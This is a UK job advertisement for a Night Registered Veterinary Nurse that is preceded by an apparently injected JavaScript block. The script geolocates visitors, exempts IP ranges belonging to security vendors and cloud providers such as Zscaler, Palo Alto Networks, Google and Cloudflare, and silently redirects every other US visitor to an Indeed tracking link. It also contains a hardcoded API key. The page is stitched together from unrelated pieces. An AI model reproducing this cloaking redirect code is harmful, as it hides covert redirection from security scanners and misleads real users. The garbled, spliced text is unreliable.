Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/dc7115effabace56/1a605417c5210b12c0b8529ef58fe8a98aed4c5a0a308cc4eb600ccd0ef88b1c/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Join our multi-award-winning Veterinary Practice as a dedicated Night Registered Veterinary Nurse, focusing on patient care and professional growth.
We offer an exciting caseload including Orthopaedics, TPLOs, Fracture Repairs, Complex Medical Cases, and Laparoscopic Spays, allowing you to develop in your areas of interest, whether in surgery, wards, anaesthesia, or ICU.
Our state-of-the-art facilities feature advanced equipment such as a CT Scanner, Gastroscope, Ultrasound, In-house lab, and upcoming MRI, supporting high-quality diagnostics and treatment.
As a Night RVN, you’ll be vital to our compassionate team, handling emergencies confidently with excellent communication and teamwork skills, always prioritising patient welfare. Our goal is to become a fear-free practice.
Benefits include a salary up to £38,000, 7-night shifts followed by 14 days off, CPD support, career progression, and various staff benefits such as pension, discounts, and health programs.
Ideal candidates have at least 3 years’ veterinary experience, a passion for patient care, and RCVS registration (preferred). Apply now to be part of our supportive, collaborative team.